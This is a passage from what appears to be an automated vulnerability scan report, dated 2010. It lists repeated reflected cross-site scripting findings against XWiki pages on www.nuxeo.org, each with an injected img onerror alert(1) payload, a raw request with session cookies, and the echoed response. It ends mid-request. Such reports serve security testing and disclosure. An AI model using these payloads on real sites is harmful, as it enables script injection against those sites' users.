<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/Register7501a%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea1cd787231b?format=xar&amp;name=XWiki.Register7501a"><img src=a onerror=alert(1)>a1cd787231b&amp;pages=XWiki.Register7501a">
...[SNIP]...

4.446. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/register/XWiki/Register

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ba825<img%20src%3da%20onerror%3dalert(1)>650a8396e8d was submitted in the REST URL parameter 5. This input was echoed as ba825<img src=a onerror=alert(1)>650a8396e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/register/XWiki/Registerba825<img%20src%3da%20onerror%3dalert(1)>650a8396e8d HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:20:39 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13987
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/Registerba825%3Cimg+src%3Da+onerror%3Dalert%281%29%3E650a8396e8d'>Registerba825<img src=a onerror=alert(1)>650a8396e8d</a>
...[SNIP]...

4.447. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/DownloadingNuxeoSources

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58367"><img%20src%3da%20onerror%3dalert(1)>5591b8e1ed1 was submitted in the REST URL parameter 4. This input was echoed as 58367"><img src=a onerror=alert(1)>5591b8e1ed1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ58367"><img%20src%3da%20onerror%3dalert(1)>5591b8e1ed1/DownloadingNuxeoSources HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:00 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13132
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/FAQ58367%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5591b8e1ed1/DownloadingNuxeoSources?format=xar&amp;name=FAQ58367"><img src=a onerror=alert(1)>5591b8e1ed1.DownloadingNuxeoSources&amp;pages=FAQ58367">
...[SNIP]...

4.448. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/DownloadingNuxeoSources

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8dc28<img%20src%3da%20onerror%3dalert(1)>e5ffb44f0ee was submitted in the REST URL parameter 4. This input was echoed as 8dc28<img src=a onerror=alert(1)>e5ffb44f0ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ8dc28<img%20src%3da%20onerror%3dalert(1)>e5ffb44f0ee/DownloadingNuxeoSources HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13066
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/FAQ8dc28%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee5ffb44f0ee/">FAQ8dc28<img src=a onerror=alert(1)>e5ffb44f0ee</a>
...[SNIP]...

4.449. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/DownloadingNuxeoSources

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3aa95<img%20src%3da%20onerror%3dalert(1)>d376d3b62f2 was submitted in the REST URL parameter 5. This input was echoed as 3aa95<img src=a onerror=alert(1)>d376d3b62f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ/DownloadingNuxeoSources3aa95<img%20src%3da%20onerror%3dalert(1)>d376d3b62f2 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:00 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13054
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources3aa95%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed376d3b62f2'>DownloadingNuxeoSources3aa95<img src=a onerror=alert(1)>d376d3b62f2</a>
...[SNIP]...

4.450. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/DownloadingNuxeoSources

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd998"><img%20src%3da%20onerror%3dalert(1)>abc85857786 was submitted in the REST URL parameter 5. This input was echoed as dd998"><img src=a onerror=alert(1)>abc85857786 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ/DownloadingNuxeoSourcesdd998"><img%20src%3da%20onerror%3dalert(1)>abc85857786 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13116
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/FAQ/DownloadingNuxeoSourcesdd998%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eabc85857786?format=xar&amp;name=FAQ.DownloadingNuxeoSourcesdd998"><img src=a onerror=alert(1)>abc85857786&amp;pages=FAQ.DownloadingNuxeoSourcesdd998">
...[SNIP]...

4.451. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/LDAPSetup

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c16a0"><img%20src%3da%20onerror%3dalert(1)>31ada847d4a was submitted in the REST URL parameter 4. This input was echoed as c16a0"><img src=a onerror=alert(1)>31ada847d4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQc16a0"><img%20src%3da%20onerror%3dalert(1)>31ada847d4a/LDAPSetup HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/FAQc16a0%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E31ada847d4a/LDAPSetup?format=xar&amp;name=FAQc16a0"><img src=a onerror=alert(1)>31ada847d4a.LDAPSetup&amp;pages=FAQc16a0">
...[SNIP]...

4.452. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/LDAPSetup

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a33f4<img%20src%3da%20onerror%3dalert(1)>95c2826bc91 was submitted in the REST URL parameter 4. This input was echoed as a33f4<img src=a onerror=alert(1)>95c2826bc91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQa33f4<img%20src%3da%20onerror%3dalert(1)>95c2826bc91/LDAPSetup HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:05 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12884
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/FAQa33f4%3Cimg+src%3Da+onerror%3Dalert%281%29%3E95c2826bc91/">FAQa33f4<img src=a onerror=alert(1)>95c2826bc91</a>
...[SNIP]...

4.453. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/LDAPSetup

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5070b"><img%20src%3da%20onerror%3dalert(1)>fc9a2887578 was submitted in the REST URL parameter 5. This input was echoed as 5070b"><img src=a onerror=alert(1)>fc9a2887578 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ/LDAPSetup5070b"><img%20src%3da%20onerror%3dalert(1)>fc9a2887578 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:53 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12934
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/FAQ/LDAPSetup5070b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Efc9a2887578?format=xar&amp;name=FAQ.LDAPSetup5070b"><img src=a onerror=alert(1)>fc9a2887578&amp;pages=FAQ.LDAPSetup5070b">
...[SNIP]...

4.454. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/LDAPSetup

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8e8b8<img%20src%3da%20onerror%3dalert(1)>61eca1214c4 was submitted in the REST URL parameter 5. This input was echoed as 8e8b8<img src=a onerror=alert(1)>61eca1214c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ/LDAPSetup8e8b8<img%20src%3da%20onerror%3dalert(1)>61eca1214c4 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:38 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12872
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup8e8b8%3Cimg+src%3Da+onerror%3Dalert%281%29%3E61eca1214c4'>LDAPSetup8e8b8<img src=a onerror=alert(1)>61eca1214c4</a>
...[SNIP]...

4.455. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5aa3d<img%20src%3da%20onerror%3dalert(1)>dfd0885cdbe was submitted in the REST URL parameter 4. This input was echoed as 5aa3d<img src=a onerror=alert(1)>dfd0885cdbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main5aa3d<img%20src%3da%20onerror%3dalert(1)>dfd0885cdbe/ HTTP/1.1
Accept: */*
Referer: http://sfwk.org/Community/SeamInProduction
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.org
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:01:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=BE6193AFA1980F364551483A4D5729AF; Path=/xwiki
Set-Cookie: visitid=FXOAWSE7OHZEHURNNDFQOSCOMRPDEOQF; Path=/
Via: 1.1 www.nuxeo.org
Content-Length: 12843

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main5aa3d%3Cimg+src%3Da+onerror%3Dalert%281%29%3Edfd0885cdbe/">Main5aa3d<img src=a onerror=alert(1)>dfd0885cdbe</a>
...[SNIP]...

4.456. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 883c9"><img%20src%3da%20onerror%3dalert(1)>af89e0dea9c was submitted in the REST URL parameter 4. This input was echoed as 883c9"><img src=a onerror=alert(1)>af89e0dea9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main883c9"><img%20src%3da%20onerror%3dalert(1)>af89e0dea9c/ HTTP/1.1
Accept: */*
Referer: http://sfwk.org/Community/SeamInProduction
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.org
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:00:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=78A0BE22BEAC05AFF375FF19572707F9; Path=/xwiki
Set-Cookie: visitid=09EFPUXSZN169ZNGLMQT1PAAT0E1VQX9; Path=/
Via: 1.1 www.nuxeo.org
Content-Length: 12909

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main883c9%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eaf89e0dea9c/WebHome?format=xar&amp;name=Main883c9"><img src=a onerror=alert(1)>af89e0dea9c.WebHome&amp;pages=Main883c9">
...[SNIP]...

4.457. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Ajax4JSF+Good+practices

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4463e"><img%20src%3da%20onerror%3dalert(1)>9bc0f92181 was submitted in the REST URL parameter 4. This input was echoed as 4463e"><img src=a onerror=alert(1)>9bc0f92181 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main4463e"><img%20src%3da%20onerror%3dalert(1)>9bc0f92181/Ajax4JSF+Good+practices HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:31 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13136
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main4463e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9bc0f92181/Ajax4JSF+Good+practices?format=xar&amp;name=Main4463e"><img src=a onerror=alert(1)>9bc0f92181.Ajax4JSF Good practices&amp;pages=Main4463e">
...[SNIP]...

4.458. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Ajax4JSF+Good+practices

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d8263<img%20src%3da%20onerror%3dalert(1)>e718aef40bc was submitted in the REST URL parameter 4. This input was echoed as d8263<img src=a onerror=alert(1)>e718aef40bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maind8263<img%20src%3da%20onerror%3dalert(1)>e718aef40bc/Ajax4JSF+Good+practices HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
